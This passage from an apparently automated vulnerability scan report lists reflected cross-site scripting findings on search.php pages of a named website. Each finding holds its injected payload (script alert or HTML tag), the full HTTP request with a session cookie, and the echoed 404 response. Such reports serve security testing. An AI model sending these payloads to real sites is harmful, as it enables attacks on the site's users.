<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&60882<script>alert(1)</script>d000d7b2976=1 was not found on this server.</p>
...[SNIP]...

2.666. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cd67e<a>fd002dcdec5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2cd67e<a>fd002dcdec5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2cd67e<a>fd002dcdec5 was not found on this server.</p>
...[SNIP]...

2.667. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55089<script>alert(1)</script>de844a9047d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication55089<script>alert(1)</script>de844a9047d/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication55089<script>alert(1)</script>de844a9047d/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.668. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b8bf<script>alert(1)</script>c81f90705dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content4b8bf<script>alert(1)</script>c81f90705dd/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content4b8bf<script>alert(1)</script>c81f90705dd/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.669. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a92e0<script>alert(1)</script>ce60052ca89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesa92e0<script>alert(1)</script>ce60052ca89/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesa92e0<script>alert(1)</script>ce60052ca89/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.670. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65662<script>alert(1)</script>13de1f2b8af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos65662<script>alert(1)</script>13de1f2b8af/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos65662<script>alert(1)</script>13de1f2b8af/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.671. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e3b00<script>alert(1)</script>7a45073954 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagese3b00<script>alert(1)</script>7a45073954/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagese3b00<script>alert(1)</script>7a45073954/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.672. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c3020<script>alert(1)</script>2a6bd098072 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/search.phpc3020<script>alert(1)</script>2a6bd098072?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.phpc3020<script>alert(1)</script>2a6bd098072?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.673. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3f5f0<a>370a8541ac1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3f5f0<a>370a8541ac1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3f5f0<a>370a8541ac1&opt=2 was not found on this server.</p>
...[SNIP]...

2.674. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8f5ff<a>503a40fec2f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...8f5ff<a>503a40fec2f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...8f5ff<a>503a40fec2f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.675. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dafd3<script>alert(1)</script>afd3248270a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&dafd3<script>alert(1)</script>afd3248270a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&dafd3<script>alert(1)</script>afd3248270a=1 was not found on this server.</p>
...[SNIP]...

2.676. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cb132<a>41b33f4749c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cb132<a>41b33f4749c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cb132<a>41b33f4749c was not found on this server.</p>
...[SNIP]...

2.677. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3c7c7<script>alert(1)</script>3f0f6329dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication3c7c7<script>alert(1)</script>3f0f6329dbf/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication3c7c7<script>alert(1)</script>3f0f6329dbf/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.678. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ed6fa<script>alert(1)</script>27a9b78a83e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contented6fa<script>alert(1)</script>27a9b78a83e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contented6fa<script>alert(1)</script>27a9b78a83e/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.679. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9d4f<script>alert(1)</script>fa17d1e2542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesb9d4f<script>alert(1)</script>fa17d1e2542/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesb9d4f<script>alert(1)</script>fa17d1e2542/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.680. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fc270<script>alert(1)</script>02a105aedfb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmosfc270<script>alert(1)</script>02a105aedfb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmosfc270<script>alert(1)</script>02a105aedfb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.681. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5e9f0<script>alert(1)</script>a62f8734f4d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/search.php5e9f0<script>alert(1)</script>a62f8734f4d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php5e9f0<script>alert(1)</script>a62f8734f4d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.682. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 74c45<a>9ee43b19e1b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search74c45<a>9ee43b19e1b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/search.php?keyword=search...&Submit3=Search74c45<a>9ee43b19e1b&opt=2 was not found on this server.</p>
...[SNIP]...

2.683. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5703b<a>e5991ea0072 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

